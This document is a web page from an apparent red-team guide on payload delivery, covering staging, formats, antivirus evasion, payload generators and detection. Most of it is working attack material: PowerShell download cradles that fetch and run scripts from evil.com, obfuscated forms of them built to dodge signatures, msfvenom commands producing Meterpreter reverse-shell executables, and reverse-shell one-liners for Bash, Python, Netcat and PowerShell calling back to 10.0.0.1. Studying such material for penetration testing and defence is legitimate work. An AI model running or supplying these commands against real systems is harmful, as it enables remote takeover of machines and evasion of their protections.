Home / Payloads

Payload Delivery: Getting Code to Execute

Payloads are the actual malicious code that runs on the target. This section covers payload types, staging strategies, and evasion techniques. The payload is what bridges the gap between "clicking a link" and "full compromise."

Types of Payloads

Payload Classification
┌─────────────────────────────────────────────────────────────────────────────┐
│                         PAYLOAD TYPES                                        │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│  BY DELIVERY:                                                               │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐             │
│  │ STAGED          │  │ STAGELESS       │  │ FILELESS        │             │
│  │ Small dropper   │  │ Full payload    │  │ Memory-only     │             │
│  │ downloads rest  │  │ in one piece    │  │ no disk writes  │             │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘             │
│                                                                             │
│  BY PURPOSE:                                                                │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐             │
│  │ BEACON          │  │ REVERSE SHELL   │  │ DOWNLOADER      │             │
│  │ C2 implant      │  │ Interactive     │  │ Fetch & execute │             │
│  │ persistent      │  │ session         │  │ next stage      │             │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘             │
│                                                                             │
│  BY FORMAT:                                                                 │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐             │
│  │ EXECUTABLE      │  │ SCRIPT          │  │ SHELLCODE       │             │
│  │ .exe, .dll      │  │ .ps1, .vbs, .js │  │ Raw bytes       │             │
│  │ PE format       │  │ Interpreter     │  │ Position-indep  │             │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘             │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘

Staged vs Stageless

The fundamental decision in payload design: do you deliver everything at once, or in pieces?

Staged Payloads

Small initial payload (stager) downloads the full payload (stage).

  • Tiny initial footprint (~300 bytes)
  • Bypasses size restrictions
  • Stage can be updated server-side
  • More network traffic
  • Fails if callback blocked

Example: meterpreter/reverse_tcp

Stageless Payloads

Complete payload in one package. No callback needed to function.

  • Larger file size (~200KB+)
  • Works offline/air-gapped
  • Single network event
  • Harder to update
  • More reliable execution

Example: meterpreter_reverse_tcp

Payload Formats

Executables (.exe, .dll)

Native Windows Portable Executable format. Can run directly or be injected into processes. Most signatured format—every AV has extensive PE detection.

Scripts (PowerShell, VBS, JS)

Interpreted by built-in Windows scripting engines. Living-off-the-land approach. Often downloaded and executed in memory without touching disk.

PowerShell Download Cradle 
# Classic IEX cradle - heavily signatured
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')

# Alternative methods
IEX (IWR http://evil.com/payload.ps1 -UseBasicParsing).Content
$a = [System.Net.WebRequest]::Create('http://evil.com/payload.ps1')
IEX ([System.IO.StreamReader]($a.GetResponse().GetResponseStream())).ReadToEnd()

Shellcode

Position-independent raw bytes that can execute anywhere in memory. The most flexible but requires a loader. Foundation of process injection and in-memory execution.

Obfuscation & Evasion

Raw payloads are instantly detected. Obfuscation transforms payloads to evade signature detection while maintaining functionality.

Encoding

  • Base64 encoding
  • XOR encryption
  • AES encryption (with key)
  • Custom encoding schemes

Structural Changes

  • String obfuscation
  • Control flow flattening
  • Dead code insertion
  • Variable renaming
PowerShell Obfuscation Examples 
# Original (detected)
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com/p.ps1')

# String concatenation
$a='Inv'+'oke'+'-Ex'+'pres'+'sion';$b='Ne'+'w-Ob'+'ject';
&($a) (&($b) Net.WebClient).DownloadString('http://evil.com/p.ps1')

# Character substitution
[char]73+[char]69+[char]88  # Spells "IEX"

# Base64 encoded command
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA...

Payload Generation Tools

  • msfvenom - Swiss army knife for payload generation
  • Veil - Payload generation with AV evasion
  • Invoke-Obfuscation - PowerShell obfuscation
  • GreatSCT - Application whitelist bypass payloads
  • Empire - PowerShell/Python payload framework (BC-SECURITY fork)
msfvenom Examples 
# Windows reverse shell executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f exe -o shell.exe

# Stageless payload (note underscore)
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=443 -f exe -o shell.exe

# Raw shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f raw -o shell.bin

# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f psh-cmd

# With encoding (less effective now)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -e x64/xor -f exe -o encoded.exe

Reverse Shell Generators

When you need a quick reverse shell, these resources generate connection-back payloads in multiple languages and formats. Essential for initial access and lateral movement.

Tool Description
revshells.com Web-based generator with encoding options (Base64, URL, etc.)
msfvenom Metasploit payload generator - supports many formats and encoders
PayloadsAllTheThings Comprehensive GitHub repo with reverse shells, web shells, and bypasses
pentestmonkey Classic cheatsheet - Bash, Python, Perl, PHP, Ruby, Netcat one-liners
Common Reverse Shell One-Liners 
# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Netcat (with -e)
nc -e /bin/sh 10.0.0.1 4444

# Netcat (without -e, use named pipe)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

# PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('10.0.0.1',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"

Detection & Defense

Static Analysis

  • Signature matching
  • Entropy analysis (encrypted = high entropy)
  • Import table analysis
  • String detection
  • YARA rules

Dynamic Analysis

  • Sandbox execution
  • Behavioral analysis
  • API call monitoring
  • Network traffic analysis
  • Memory scanning
The Cat and Mouse Game

AV vendors update signatures daily. A payload that works today may be detected tomorrow. Professional operators build custom loaders and regularly test against current AV. Tools like antiscan.me test without submitting to AV vendors.

MITRE ATT&CK Mapping

T1059

Command and Scripting Interpreter - PowerShell, cmd, bash payloads

T1027

Obfuscated Files or Information - Encoding, encryption, packing

T1140

Deobfuscate/Decode Files - Runtime decoding of payloads

T1620

Reflective Code Loading - In-memory payload execution

T1055

Process Injection - Shellcode injection into running processes

T1204

User Execution - Requiring user to run malicious file